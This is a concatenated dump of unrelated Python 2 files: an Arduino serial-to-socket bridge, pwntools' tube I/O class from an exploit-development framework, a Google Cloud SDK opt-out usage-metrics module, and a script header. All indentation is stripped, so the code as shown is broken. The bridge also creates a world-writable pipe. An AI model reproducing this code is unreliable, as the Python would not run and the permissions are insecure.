print '--- deviceWebSocket on %s: %d,%s,%s,%s ---' % (
self.serial.port,
self.serial.baudrate,
self.serial.bytesize,
self.serial.parity,
self.serial.stopbits,
)
self.consoleMessage('x:Exit ')
def getch(self):
# Returns a keyboard character after kbhit() has been called.
# Should not be called in the same program as getarrow().
s = ''
return sys.stdin.read(1)
def kbhit(self):
# Returns True if keyboard character was hit, False otherwise.
dr, dw, de = select([sys.stdin], [], [], 0)
return dr != []
def consoleMessage(self, message):
if self.termTrueFalse == True:
print message + chr(0x0D)
# print '\n'
def set_normal_term(self):
print "set_normal_term()"
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old_term)
def start(self):
self.alive = True
if self.simulation == True:
self.simulate_thread = threading.Thread(target=self.simulate)
self.simulate_thread.setDaemon(1)
self.simulate_thread.start()
else:
self.deviceReader_thread = threading.Thread(target=self.deviceReader)
self.deviceReader_thread.setDaemon(1)
self.deviceReader_thread.start()
if self.termTrueFalse == True:
self.consoleReader_thread = threading.Thread(target=self.consoleReader)
self.consoleReader_thread.setDaemon(1)
self.consoleReader_thread.start()
self.deviceWriter_thread = threading.Thread(target=self.deviceWriter)
self.deviceWriter_thread.setDaemon(1)
self.deviceWriter_thread.start()
self.socketServer_thread = threading.Thread(target=self.socketServer)
self.socketServer_thread.setDaemon(1)
self.socketServer_thread.start()
self.Timer_thread = threading.Thread(target=self.myTimer)
self.Timer_thread.setDaemon(1)
self.Timer_thread.start()
if self.termTrueFalse == True:
self.consoleReader_thread.join()
if self.simulation == False:
self.deviceReader_thread.join()
# self.socketServer.join()
# self.socketServer_thread.join()
def stop(self):
self.alive = False
self.serial.close()
sys.exit(1)
def simulate(self):
while True:
sleep(4.0)
# self.consoleMessage("simulate")
volt1 = random.uniform(7.9, 8.2)
receivedString = "10190 11.15 151.2 1686.1 %f 0.0 0.0 0.00 199.00 200.00" % volt1
self.consoleMessage('Received: %s' % receivedString.rstrip())
evaluateString = "DATA: %s" % receivedString.rstrip()
self.evaluateResponse(evaluateString)
def myTimer(self):
# keep socket connection alive
global mysocketMessage
global mysocketMessageJSON
global myEvent
while True:
sleep(5)
self.consoleMessage('keep socket connection alive timer event')
mysocketMessage.counter = mysocketMessage.counter + 1
mysocketMessage.text = 'idle'
mysocketMessage.Line = ''
mysocketMessage.status = 'idle'
self.sendSocketMessage()
def socketServer(self):
global myEvent
global mysocketMessage
global mysocketMessageJSON
s = socket.socket() # Create a socket object
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
host = socket.gethostname() # Get local machine name
print 'Host name = %s' % host
port = 12344 # Reserve a port for your service.
# s.bind((host, port)) # Bind to the port
# s.bind(('127.0.0.1', port))
s.bind(('localhost', port))
s.listen(5) # Now wait for client connection.
self.counter = 0
while True:
socketConn, addr = s.accept() # Establish connection with client.
# self.dump(addr)
self.consoleMessage('Got connection from %s' % str(addr))
# print 'Got connection from', addr
recv = socketConn.recv(4096)
self.clientMessage = recv
if len(self.clientMessage) > 1:
print "client message %s" % self.clientMessage
if 'waits' in self.clientMessage:
print 'client waits'
# hold loop until new message ready to send
myEvent.wait()
socketConn.send(mysocketMessageJSON)
socketConn.close() # Close the connection
# sleep(2)
def dump(self, obj):
for attr in dir(obj):
print "obj.%s = %s" % (attr, getattr(obj, attr))
def sendSocketMessage(self):
global mysocketMessage
global mysocketMessageJSON
global myEvent
mysocketMessage.counter = mysocketMessage.counter + 1
Line = mysocketMessage.Line
counter = mysocketMessage.counter
status = mysocketMessage.status
mysocketMessageJSON = json.dumps({'status': status, 'counter':counter, 'Line':Line}, indent=0)
myEvent.set()
myEvent.clear()
def deviceWriter(self):
while True:
self.counter += 1
self.consoleMessage('deviceWriter thread alive %d\n' % self.counter)
# the name of the pipe
pipeNameIn = '/dev/shm/deviceWebSocketPipe'
# we will get an error if the pipe exists
# when creating a new one, so try removing it first
try:
os.unlink(pipeNameIn)
except:
pass
# create the pipe and open it for reading
os.mkfifo(pipeNameIn)
os.chmod(pipeNameIn, 0777)
pipe = open(pipeNameIn, 'r')
# read forever and print anything written to the pipe
data = pipe.readline()
if data != '':
print 'Received from pipe:'
print data
self.decoded = json.loads(data)
if 'commands' in self.decoded:
mycommand = self.decoded['commands']
if 'param' in self.decoded:
param = self.decoded['param']
self.COMMAND(mycommand, param)
sleep(0.5)
def COMMAND(self, command, param):
#print 'Command:'
#print command
if 'PWM' in command:
#print 'PWM found %d' % param
newPWM = int(param)
arduinoMessageJSON = '{"PWM":%d}' % newPWM
self.serial.write(arduinoMessageJSON)
# Wait for output buffer to drain.
self.serial.flush()
if self.simulation == True:
simulator.processCommands(self, command)
def deviceReader(self):
try:
while self.alive:
data = self.serial.read(1)
if data is not '':
self.receivedString += data
if data == '\x0A':
self.consoleMessage('Received: %s' % self.receivedString.rstrip())
evaluateString = "DATA: %s" % self.receivedString.rstrip()
self.evaluateResponse(evaluateString)
self.receivedString = ''
sys.stdout.flush()
except serial.SerialException, e:
self.alive = False
# would be nice if the console reader could be interruptted at this
# point...
raise
def evaluateResponse(self, message):
global mysocketMessage
# print message
if 'LINE' in message:
print 'LINE found'
if self.RTCinstalled == 1:
nowdatetime = self.myrtc.read_str()
RTCTime = self.myrtc.read_str()
RTCTimeShort = '%s%s' % (RTCTime[0:8], RTCTime[9:17])
curdate = '20%s' % (RTCTime[0:8])
curdatetime = '20' + RTCTime
else:
curdatetime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
output = "%s %s" % (curdatetime, message.rstrip())
mysocketMessage.status = 'measure'
mysocketMessage.Line = output
self.sendSocketMessage()
if 'DATA' in message:
# print 'DATA found'
if self.RTCinstalled == 1:
nowdatetime = self.myrtc.read_str()
RTCTime = self.myrtc.read_str()
RTCTimeShort = '%s%s' % (RTCTime[0:8], RTCTime[9:17])
curdate = '20%s' % (RTCTime[0:8])
curdatetime = '20' + RTCTime
else:
curdatetime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
curdate = curdatetime[0:10]
output = "%s %s" % (curdatetime, message.rstrip())
mysocketMessage.status = 'measure'
mysocketMessage.Line = output
# print mysocketMessage.Line
self.sendSocketMessage()
#print curdatetime[5:7]
#print curdatetime[8:10]
yearc=int(curdatetime[0:4])
monc=int(curdatetime[5:7])
dayc=int(curdatetime[8:10])
hourc=int(curdatetime[11:13])
minc=int(curdatetime[14:16])
secc=int(curdatetime[17:19])
yearp=int(self.previousdatetime[0:4])
monp=int(self.previousdatetime[5:7])
dayp=int(self.previousdatetime[8:10])
hourp=int(self.previousdatetime[11:13])
minp=int(self.previousdatetime[14:16])
secp=int(self.previousdatetime[17:19])
a = datetime.datetime(yearc,monc,dayc,hourc,minc,secc)
b = datetime.datetime(yearp,monp,dayp,hourp,minp,secp)
diff=(a-b).total_seconds()
#print a.strftime('%Y-%m-%d %H:%M:%S')
#print diff
if(diff>30):
self.previousdatetime=curdatetime
fileName = ("../writeFiles/ardData%s.txt" % curdate)
fh = open(fileName, "a")
fh.write(output+ "\n")
fh.close
if 'END_DATA' in message:
# print 'END_DATA found'
mysocketMessage.status = 'complete'
self.sendSocketMessage()
pass
def consoleReader(self):
# loop until EXITCHARACTER character
try:
while self.alive:
try:
# c = self.getkey()
c = self.getch()
except KeyboardInterrupt:
c = '\x03'
if c == 'x':
print 'Exit'
if self.termTrueFalse == True:
self.set_normal_term()
self.stop()
break # exit app
# if c == 'i':
# mySocketMessage.status = 'idle'
# self.sendSocketMessage()
except:
self.alive = False
raise
def main():
global deviceWebSocket
parser = optparse.OptionParser(
usage="%prog [options] [port [baudrate]]",
description="deviceWebSocket"
)
parser.add_option("-p", "--port",
dest="port",
help="port, a number (default 0) or a device name (deprecated option)",
default='/dev/ttyS0'
)
parser.add_option("-b", "--baud",
dest="baudrate",
action="store",
type='int',
help="set baud rate, default %default",
default=9600
)
parser.add_option("--parity",
dest="parity",
action="store",
help="set parity, one of [N, E, O, S, M], default=N",
default='N'
)
parser.add_option("-s", "--sim",
dest="simulation",
action="store_true",
help="simulation (default off)",
default=False
)
parser.add_option("-e", "--echo",
dest="echo",
action="store_true",
help="enable local echo (default off)",
default=False
)
(options, args) = parser.parse_args()
options.parity = options.parity.upper()
if options.parity not in 'NEOSM':
parser.error("invalid parity")
port = options.port
baudrate = options.baudrate
if args:
if options.port is not None:
parser.error("no arguments are allowed, options only when --port is given")
port = args.pop(0)
if args:
try:
baudrate = int(args[0])
except ValueError:
parser.error("baud rate must be a number, not %r" % args[0])
args.pop(0)
if args:
parser.error("too many arguments")
else:
if port is None: port = 0
try:
deviceWebSocket = deviceWebSocket(
port,
baudrate,
options.parity,
echo=options.echo,
simulation=options.simulation
)
except serial.SerialException, e:
sys.stderr.write("could not open port %r: %s\n" % (port, e))
sys.exit(1)
deviceWebSocket.start()
if __name__ == '__main__':
main()
|
tube.py
|
from .. import log, log_levels, context, term, atexit, thread
from ..util import misc
import re, threading, sys, time, subprocess
def _fix_timeout(timeout, default):
if timeout == 'default':
return default
elif timeout == None:
return timeout
elif isinstance(timeout, (int, long, float)):
if timeout < 0:
log.error("timeout cannot be negative")
else:
return timeout
else:
log.error("timeout must be either a number, None or the string 'default'")
class tube(object):
"""Container of all the tube functions common to both sockets, TTYs and SSH connetions."""
def __init__(self, timeout='default'):
self.buffer = []
self.timeout = _fix_timeout(timeout, context.timeout)
atexit.register(self.close)
# Functions based on functions from subclasses
def recv(self, numb = 4096, timeout = 'default'):
"""recv(numb = 4096, timeout = 'default') -> str
Receives up to `numb` bytes of data from the tube.
If a timeout occurs while waiting, it will return None.
If the connection has been closed for receiving,
:exc:`exceptions.EOFError` will be raised.
If the string "default" is given as the timeout, then
the timeout set by the constructor or :func:`settimeout`
will be used. If None is given, then there will be no timeout.
It will also print a debug message with log level
:data:`pwnlib.log_levels.DEBUG` about the received data.
"""
if self.buffer:
data = []
n = 0
while self.buffer and n < numb:
s = self.buffer.pop()
data.append(s)
n += len(s)
if n < numb:
try:
s = self._recv(numb - n, timeout = 0)
if s != None:
data.append(s)
except EOFError:
pass
elif n > numb:
s = data.pop()
delta = n - numb
self.buffer.append(s[delta:])
data.append(s[:delta])
return ''.join(data)
return self._recv(numb, timeout = timeout)
def _recv(self, numb = 4096, timeout = 'default'):
"""_recv(numb = 4096, timeout = 'default') -> str
Recieves one chunk of from the internal buffer or from the OS if the
buffer is empty.
"""
# If there is already data, go with that
if self.buffer:
data = self.buffer.pop()
else:
if timeout == 'default':
data = self.recv_raw(4096)
else:
timeout = _fix_timeout(timeout, self.timeout)
old_timeout = self.timeout
self.settimeout(timeout)
data = self.recv_raw(4096)
self.settimeout(old_timeout)
if data == None:
return None
else:
if context.log_level <= log_levels.DEBUG:
for line in data.splitlines(True):
log.debug('Received: %r' % line)
if len(data) > numb:
self.buffer.append(data[numb:])
data = data[:numb]
return data
def recvpred(self, pred, timeout = 'default'):
"""recvpred(pred, timeout = 'default') -> str
Receives one byte at a time from the tube, until ``pred(bytes)``
evaluates to True.
If a timeout occurs while waiting, it will return None, and any
received bytes will be saved for later. It will never return
partial data, which did not make the predicate become True.
If the connection has been closed for receiving,
:exc:`exceptions.EOFError` will be raised.
.. note::
Note that any data received before the occurence of an exception,
will be saved for use by a later receive. This means that
even if you get an :exc:`exceptions.EOFError`, you might in rare
cases be able to do a receive anyways.
If the string "default" is given as the timeout, then
the timeout set by the constructor or :func:`settimeout`
will be used. If None is given, then there will be no timeout.
"""
data = ''
try:
while not pred(data):
res = self._recv(1, timeout)
if res == None:
self.buffer.append(data)
return None
data += res
except:
self.buffer.append(data)
raise
return data
def recvn(self, numb, timeout = 'default'):
"""recvn(numb, timeout = 'default') -> str
Recieves exactly `n` bytes.
"""
data = []
n = 0
while n < numb:
try:
res = self._recv(timeout = timeout)
if res == None:
self.buffer.extend(data)
return None
except:
self.buffer.extend(data)
raise
n += len(res)
data.append(res)
if numb < n:
s = data.pop()
delta = len(s) - (n - numb)
self.buffer.append(s[delta:])
data.append(s[:delta])
return ''.join(data)
def recvuntil(self, delims, timeout = 'default'):
"""recvuntil(delims, timeout = 'default') -> str
Continue recieving until the recieved data ends with one of `delims`.
As a shorthand, ``delim`` may be used instead of ``(delim, )``.
"""
if not hasattr(delims, '__iter__'):
delims = (delims,)
delimslen = max(len(delim) for delim in delims)
data = ''
i = 0
while True:
try:
res = self._recv(timeout = timeout)
if res == None:
self.buffer.append(data)
return None
except:
self.buffer.append(data)
raise
data += res
for delim in delims:
j = data.find(delim, i)
if j > -1:
j += len(delim)
data, rest = data[:j], data[j:]
if rest:
self.buffer.append(rest)
return data
if len(data) > delimslen:
i = len(data) - delimslen + 1
def recvlines(self, numlines, keepends = False, timeout = 'default'):
"""recvlines(numlines, keepends = False) -> str list
Recieve `numlines` lines. The lines are returned as a list.
Line breaks are not included unless `keepends` is set to :const:`True`.
"""
data = []
for _ in xrange(numlines):
try:
res = self.recvuntil('\n', timeout = timeout)
if res == None:
self.buffer.extend(data)
return None
except:
self.buffer.extend(data)
raise
data.append(res)
if keepends:
return data
return [line[:-1] for line in data]
def recvline(self, delims = None, keepend = False, timeout = 'default'):
"""recvline(delims = None, keepend = False) -> str
If `delims` is :const:`None`, then recieve and return exactly one line.
Otherwise, keep recieving lines until one is found which contains at
least of `delims`. The last line recieved will be returned.
As a shorthand, ``delim`` may be used instead of ``(delim, )``.
Only includes the line break if `keepend` is set to :const:`True`.
"""
if delims == None:
res = self.recvlines(1, keepends = keepend, timeout = timeout)
if res == None:
return None
return res[0]
if not hasattr(delims, '__iter__'):
delims = (delims,)
data = []
while True:
try:
res = self.recvuntil('\n', timeout = timeout)
if res == None:
self.buffer.extend(data)
return None
except:
self.buffer.extend(data)
raise
if any(delim in res for delim in delims):
break
data.append(res)
if keepend:
return res
return res[:-1]
def recvline_pred(self, pred, keepend = False, timeout = 'default'):
"""recvline_pred(pred, keepend = False) -> str
Keep recieving lines until one, ``line``, is found such that
``bool(pred(line)) == True``. Returns the last line recieved.
Only includes the line break if `keepend` is set to :const:`True`.
"""
data = []
while True:
try:
res = self.recvuntil('\n', timeout = timeout)
if res == None:
self.buffer.extend(data)
return None
if pred(res):
break
except:
self.buffer.extend(data)
raise
data.append(res)
if keepend:
return res
return res[:-1]
def recvline_startswith(self, delims, keepend = False, timeout = 'default'):
"""recvline_startswith(delims, keepend = False) -> str
Keep recieving lines until one is found that starts with one of
`delims`. Returns the last line recieved.
As a shorthand, ``delim`` may be used instead of ``(delim, )``.
Only includes the line break if `keepend` is set to :const:`True`.
"""
if not hasattr(delims, '__iter__'):
delims = (delims,)
data = []
while True:
try:
res = self.recvuntil('\n', timeout = timeout)
if res == None:
self.buffer.extend(data)
return None
except:
self.buffer.extend(data)
raise
if any(res.startswith(delim) for delim in delims):
break
data.append(res)
if keepend:
return res
return res[:-1]
def recvline_endswith(self, delims, keepend = False, timeout = 'default'):
"""recvline_endswith(delims, keepend = False) -> str
Keep recieving lines until one is found that ends with one of `delims`.
Returns the last line recieved.
As a shorthand, ``delim`` may be used instead of ``(delim, )``.
Only includes the line break if `keepend` is set to :const:`True`.
"""
if not hasattr(delims, '__iter__'):
delims = (delims,)
data = []
while True:
try:
res = self.recvuntil('\n', timeout = timeout)
if res == None:
self.buffer.extend(data)
return None
except:
self.buffer.extend(data)
raise
if any(res.endswith(delim) for delim in delims):
break
data.append(res)
if keepend:
return res
return res[:-1]
def recvregex(self, regex, exact = False, timeout = 'default'):
"""recvregex(regex, exact = False, timeout = 'default') -> str
Wrapper around :func:`recvpred`, which will return when a regex
matches the string in the buffer.
By default :func:`re.RegexObject.search` is used, but if `exact` is
set to True, then :func:`re.RegexObject.match` will be used instead.
"""
if isinstance(regex, (str, unicode)):
regex = re.compile(regex)
if exact:
pred = regex.match
else:
pred = regex.search
return self.recvpred(pred, timeout = timeout)
def recvline_regex(self, regex, exact = False, keepend = False,
timeout = 'default'):
"""recvregex(regex, exact = False, keepend = False,
timeout = 'default') -> str
Wrapper around :func:`recvline_pred`, which will return when a regex
matches a line.
By default :func:`re.RegexObject.search` is used, but if `exact` is
set to True, then :func:`re.RegexObject.match` will be used instead.
"""
if isinstance(regex, (str, unicode)):
regex = re.compile(regex)
if exact:
pred = regex.match
else:
pred = regex.search
return self.recvline_pred(pred, keepend = keepend, timeout = timeout)
def recvrepeat(self, timeout = 'default'):
"""recvrepeat()
Receives data until a timeout or EOF is reached.
"""
timeout = _fix_timeout(timeout, self.timeout)
if timeout == None:
timeout = 0.1
r = []
while True:
try:
s = self.recv(10000, timeout = timeout)
except EOFError:
break
if s == None:
break
r.append(s)
return ''.join(r)
def recvall(self):
"""recvall() -> str
Receives data until EOF is reached.
"""
h = log.waitfor('Recieving all data')
l = 0
r = []
while True:
try:
s = self.recv(timeout = 0.1)
except EOFError:
break
if s == None:
continue
r.append(s)
l += len(s)
h.status(misc.size(l))
h.success()
self.close()
return ''.join(r)
def send(self, data):
"""send(data)
Sends data. Will also print a debug message with
log level :data:`pwnlib.log_levels.DEBUG` about it.
If it is not possible to send anymore because of a closed
connection, it raises and :exc:`exceptions.EOFError`.
"""
if context.log_level <= log_levels.DEBUG:
for line in data.splitlines(True):
log.debug('Send: %r' % line)
self.send_raw(data)
def sendline(self, line):
"""sendline(data)
Shorthand for ``send(data + '\\n')``.
"""
self.send(line + '\n')
def sendafter(self, delim, data, timeout = 'default'):
"""sendafter(delim, data, timeout = 'default') -> str
A combination of ``recvuntil(delim, timeout)`` and ``send(data)``."""
res = self.recvuntil(delim, timeout)
self.send(data)
return res
def sendlineafter(self, delim, data, timeout = 'default'):
"""sendlineafter(delim, data, timeout = 'default') -> str
A combination of ``recvuntil(delim, timeout)`` and ``sendline(data)``."""
res = self.recvuntil(delim, timeout)
self.sendline(data)
return res
def sendthen(self, delim, data, timeout = 'default'):
"""sendthen(delim, data, timeout = 'default') -> str
A combination of ``send(data)`` and ``recvuntil(delim, timeout)``."""
self.send(data)
return self.recvuntil(delim, timeout)
def sendlinethen(self, delim, data, timeout = 'default'):
"""sendlinethen(delim, data, timeout = 'default') -> str
A combination of ``sendline(data)`` and ``recvuntil(delim, timeout)``."""
self.send(data + '\n')
return self.recvuntil(delim, timeout)
def interactive(self, prompt = term.text.bold_red('$') + ' '):
"""interactive(prompt = pwnlib.term.text.bold_red('$') + ' ')
Does simultaneous reading and writing to the tube. In principle this just
connects the tube to standard in and standard out, but in practice this
is much more usable, since we are using :mod:`pwnlib.term` to print a
floating prompt.
Thus it only works in while in :data:`pwnlib.term.term_mode`.
"""
log.info('Switching to interactive mode')
go = [True]
def recv_thread(go):
while go[0]:
try:
cur = self.recv(timeout = 0.05)
if cur == None:
continue
sys.stdout.write(cur)
sys.stdout.flush()
except EOFError:
log.info('Got EOF while reading in interactive')
break
t = thread.Thread(target = recv_thread, args = (go,))
t.daemon = True
t.start()
try:
while go[0]:
if term.term_mode:
data = term.readline.readline(prompt = prompt, float = True)
else:
data = sys.stdin.read(1)
if data:
try:
self.send(data)
except EOFError:
go[0] = False
log.info('Got EOF while sending in interactive')
else:
go[0] = False
except KeyboardInterrupt:
log.info('Interrupted')
while t.is_alive():
t.join(timeout = 0.1)
def clean(self, timeout = 0.05):
"""clean(timeout = 0.05)
Removes all the buffered data from a tube by calling
:meth:`pwnlib.tubes.tube.tube.recv` with a low timeout until it fails.
"""
self.recvrepeat(timeout = timeout)
def clean_and_log(self, timeout = 0.05):
"""clean_and_log(timeout = 0.05)
Works exactly as :meth:`pwnlib.tubes.tube.tube.clean`, but logs recieved
data with :meth:`pwnlib.log.info`.
"""
if self.connected():
log.info('Cleaning tube (fileno = %d):' % self.fileno())
log.indented(self.recvrepeat(timeout = timeout))
def connect_input(self, other):
"""connect_input(other)
Connects the input of this tube to the output of another tube object."""
def pump():
import sys as _sys
while True:
if not (self.connected('send') and other.connected('recv')):
break
try:
data = other.recv(timeout = 0.05)
except EOFError:
break
if not _sys:
return
if data == None:
continue
try:
self.send(data)
except EOFError:
break
if not _sys:
return
self.shutdown('send')
other.shutdown('recv')
t = thread.Thread(target = pump)
t.daemon = True
t.start()
def connect_output(self, other):
"""connect_output(other)
Connects the output of this tube to the input of another tube object."""
other.connect_input(self)
def connect_both(self, other):
"""connect_both(other)
Connects the both ends of this tube object with another tube object."""
self.connect_input(other)
self.connect_output(other)
def spawn_process(self, *args, **kwargs):
"""Spawns a new process having this tube as stdin, stdout and stderr.
Takes the same arguments as :class:`subprocess.Popen`."""
subprocess.Popen(
*args,
stdin = self.fileno(),
stdout = self.fileno(),
stderr = self.fileno(),
**kwargs
)
def __lshift__(self, other):
self.connect_input(other)
return other
def __rshift__(self, other):
self.connect_output(other)
return other
def __ne__(self, other):
self << other << self
def wait_for_close(self):
"""Waits until the tube is closed."""
while self.connected():
time.sleep(0.05)
def can_recv(self, timeout = 0):
"""can_recv(timeout = 0) -> bool
Returns True, if there is data available within `timeout` seconds."""
return bool(self.buffer or self.can_recv_raw(timeout))
def settimeout(self, timeout):
"""settimeout(timeout)
Set the timeout for receiving operations. If the string "default"
is given, then :data:`context.timeout` will be used. If None is given,
then there will be no timeout.
"""
self.timeout = _fix_timeout(timeout, context.timeout)
self.settimeout_raw(self.timeout)
def shutdown(self, direction = "send"):
"""shutdown(direction = "send")
Closes the tube for futher reading or writing depending on `direction`.
Args:
direction(str): Which direction to close; "in", "read" or "recv"
closes the tube in the ingoing direction, "out", "write" or "send"
closes it in the outgoing direction.
Returns:
:const:`None`
"""
if direction in ('in', 'read', 'recv'):
direction = 'recv'
elif direction in ('out', 'write', 'send'):
direction = 'send'
else:
log.error('direction must be "in", "read" or "recv", or "out", "write" or "send"')
self.shutdown_raw(direction)
def connected(self, direction = 'any'):
"""connected(direction = 'any') -> bool
Returns True if the tube is connected in the specified direction.
Args:
direction(str): Can be the string 'any', 'in', 'read', 'recv',
'out', 'write', 'send'.
"""
if direction in ('in', 'read', 'recv'):
direction = 'recv'
elif direction in ('out', 'write', 'send'):
direction = 'send'
elif direction == 'any':
pass
else:
log.error('direction must be "any", "in", "read" or "recv", or "out", "write" or "send"')
return self.connected_raw(direction)
def __enter__(self):
"""Permit use of 'with' to control scoping and closing sessions.
>>> shell = ssh(host='bandit.labs.overthewire.org',user='bandit0',password='bandit0') # doctest: +SKIP
>>> with shell.run('bash') as s: # doctest: +SKIP
... s.sendline('echo helloworld; exit;')
... print 'helloworld' in s.recvall()
...
True
"""
return self
def __exit__(self, type, value, traceback):
"""Handles closing for 'with' statement"""
self.close()
# The minimal interface to be implemented by a child
def recv_raw(self, numb):
"""recv_raw(numb) -> str
Should not be called directly. Receives data without using the buffer
on the object.
Unless there is a timeout or closed connection, this should always
return data. In case of a timeout, it should return None, in case
of a closed connection it should raise an :exc:`exceptions.EOFError`.
"""
log.bug('Should be implemented by a subclass.')
def send_raw(self, data):
"""send_raw(data)
Should not be called directly. Sends data to the tube.
Should return :exc:`exceptions.EOFError`, if it is unable to send any
more, because of a close tube.
"""
log.bug('Should be implemented by a subclass.')
def settimeout_raw(self, timeout):
"""settimeout_raw(timeout)
Should not be called directly. Sets the timeout for
the tube.
"""
log.bug('Should be implemented by a subclass.')
def can_recv_raw(self, timeout):
"""can_recv_raw(timeout) -> bool
Should not be called directly. Returns True, if
there is data available within the timeout, but
ignores the buffer on the object.
"""
log.bug('Should be implemented by a subclass.')
def connected_raw(self, direction):
"""connected(direction = 'any') -> bool
Should not be called directly. Returns True iff the
tube is connected in the given direction.
"""
log.bug('Should be implemented by a subclass.')
def close(self):
"""close()
Closes the tube.
"""
log.bug('Should be implemented by a subclass.')
def fileno(self):
"""fileno() -> int
Returns the file number used for reading.
"""
log.bug('Should be implemented by a subclass.')
def shutdown_raw(self, direction):
"""shutdown_raw(direction)
Should not be called directly. Closes the tube for further reading or
writing.
"""
log.bug('Should be implemented by a subclass.')
|
metrics.py
|
# Copyright 2013 Google Inc. All Rights Reserved.
"""Used to collect anonymous SDK usage information."""
import atexit
import collections
import hashlib
import mutex
import os
import Queue
import socket
import sys
import threading
import urllib
import uuid
import httplib2
from googlecloudsdk.core import config
from googlecloudsdk.core import log
from googlecloudsdk.core import properties
from googlecloudsdk.core.util import platforms
_ENDPOINT = 'https://ssl.google-analytics.com/collect'
_TID = 'UA-36037335-2'
_Event = collections.namedtuple('Event',
['category', 'action', 'label', 'value'])
class _MetricsWorker(object):
"""A class to process usage events."""
DONE = 'DONE'
@staticmethod
def StartMetrics():
"""Starts the thread for handling events.
Returns:
The running MetricsWorker or None if initialization failed.
"""
disabled = properties.VALUES.core.disable_usage_reporting.GetBool()
if disabled is None:
# If there is no preference set, fall back to the installation default.
disabled = config.INSTALLATION_CONFIG.disable_usage_reporting
if disabled:
log.debug('Metrics are disabled.')
return None
try:
return _MetricsWorker()
# pylint: disable=bare-except, We never want to fail because of metrics.
# Worst case scenario, they are just not sent.
except:
# If any part of this fails, just don't do any reporting
log.debug('Metrics failed to start: %s', sys.exc_info())
return None
def __init__(self):
"""Initialize a new MetricsWorker.
This should only be invoked through the static _StartMetics() function which
will do the appropriate error handling.
"""
user_agent = 'CloudSDK/{version} {fragment}'.format(
version=config.CLOUD_SDK_VERSION,
fragment=platforms.Platform.Current().UserAgentFragment())
self.__headers = {
'User-Agent': user_agent,
}
self.__project_ids = {}
hostname = socket.getfqdn()
install_type = 'Google' if hostname.endswith('.google.com') else 'External'
self.__params = [
('v', '1'),
('tid', _TID),
('cid', _MetricsWorker.__GetCID()),
('t', 'event'),
('cd1', config.INSTALLATION_CONFIG.release_channel),
('cd2', install_type),
]
self.__queue = Queue.Queue()
self.__thread = self.__Start()
log.debug('Metrics started...')
@staticmethod
def __GetCID():
"""Gets the client id from the config file, or generates a new one.
Returns:
str, The hex string of the client id.
"""
uuid_path = config.Paths().analytics_cid_path
cid = None
if os.path.exists(uuid_path):
with open(uuid_path) as f:
cid = f.read()
if cid:
return cid
with open(uuid_path, 'w') as f:
cid = uuid.uuid4().hex
f.write(cid) # A random UUID
return cid
def __Start(self):
"""Starts the reporting thread.
Returns:
The running Thread object.
"""
t = threading.Thread(target=self.__Run)
t.daemon = True
t.start()
return t
def __Run(self):
# Save local references for speed.
queue = self.__queue
base_params = self.__params
headers = self.__headers
while True:
event = queue.get()
try:
if event == _MetricsWorker.DONE:
return
self.__SendEvent(headers, base_params, event)
log.debug('Sent event: %s', str(event))
# pylint: disable=broad-except, httplib2 raises all sort of exceptions
# from different modules. We never want a failure to report metrics to
# surface in the terminal so catch everything and log it.
except Exception as e:
log.file_only_logger.exception('Failed to send event: %s, %s',
str(event), e)
finally:
queue.task_done()
def __GetProjectIDHash(self):
"""Gets the hash of the current project id.
Returns:
str, The hex digest of the current project id or None if the
project is not set.
"""
project_id = properties.VALUES.core.project.Get()
if not project_id:
return None
hashed_id = self.__project_ids.get(project_id)
if not hashed_id:
checksum = hashlib.sha1()
checksum.update(project_id)
hashed_id = checksum.hexdigest()
self.__project_ids[project_id] = hashed_id
return hashed_id
def __SendEvent(self, headers, base_params, event):
"""Sends the given event to analytics.
Args:
headers: {name, value}, The HTTP headers to use for this request.
base_params: [(name, value)], The analytics parameters to use for this
event.
event: Event, The event to send
"""
h = httplib2.Http()
params = [
('ec', event.category),
('ea', event.action),
('el', event.label),
('ev', event.value),
]
project_id_hash = self.__GetProjectIDHash()
if project_id_hash:
params.append(('cd11', project_id_hash))
params.extend(base_params)
body = urllib.urlencode(params)
h.request(_ENDPOINT, method='POST', body=body, headers=headers)
def ProcessEvent(self, event):
"""Adds the given event to the processing queue.
Args:
event: _Event, The event to send.
"""
self.__queue.put(event)
def Shutdown(self):
"""Shutdown the metrics thread."""
self.__queue.put(_MetricsWorker.DONE)
# An arbitrarily short time to wait. Hopefully this will be enough to allow
# the thread to get some execution time and finish. If not, it is a daemon
# thread so it will just be killed when we exit, and maybe the metrics
# will not be sent.
self.__thread.join(.5)
_metrics_worker = None
_mutex_lock = mutex.mutex()
_metrics_worker_started = False
@atexit.register
def Shutdown():
"""Shuts down the reporting thread.
The thread will be restarted if you record new events.
"""
def _Shutdown(unused_none):
global _metrics_worker, _metrics_worker_started
if _metrics_worker:
log.debug('Shutting down metrics...')
_metrics_worker.Shutdown()
_metrics_worker = None
_metrics_worker_started = False
_mutex_lock.lock(function=_Shutdown, argument=None)
_mutex_lock.unlock()
def _ProcessEvent(category, action, label, value=0):
"""Common code for processing a metrics event."""
def _CreateWorker(unused_none):
global _metrics_worker, _metrics_worker_started
if not _metrics_worker_started:
_metrics_worker = _MetricsWorker.StartMetrics()
_metrics_worker_started = True
# Don't do metrics for completions.
if '_ARGCOMPLETE' in os.environ:
return
_mutex_lock.lock(function=_CreateWorker, argument=None)
_mutex_lock.unlock()
if _metrics_worker:
_metrics_worker.ProcessEvent(
_Event(category=category, action=action, label=label, value=value))
def Installs(component_id, version_string):
"""Logs that an SDK component was installed.
Args:
component_id: str, The component id that was installed.
version_string: str, The version of the component.
"""
_ProcessEvent('Installs', component_id, version_string)
def Commands(command_path, version_string):
"""Logs that an SDK command was run.
Args:
command_path: str, The '.' separated name of the calliope command.
version_string: str, The version of the command.
"""
if not version_string:
version_string = 'unknown'
_ProcessEvent('Commands', command_path, version_string)
def Executions(command_name, version_string):
"""Logs that a top level SDK script was run.
Args:
command_name: str, The script name.
version_string: str, The version of the command.
"""
if not version_string:
version_string = 'unknown'
_ProcessEvent('Executions', command_name, version_string)
|
hogKeyboard.py
|
####################################################################################################################
#
# *****smartRemotes created by HeadHodge*****
#
# HeadHodge/smartRemotes is licensed under the MIT License
#
# A short and simple permissive license with conditions only requiring preservation of copyright and license notices.
# Licensed works, modifications, and larger works may be distributed under different terms and without source code.
#
####################################################################################################################
###########################################
# HOG KEYBOARD
###########################################
print("Load hogKeyboard")
from gi.repository import GLib
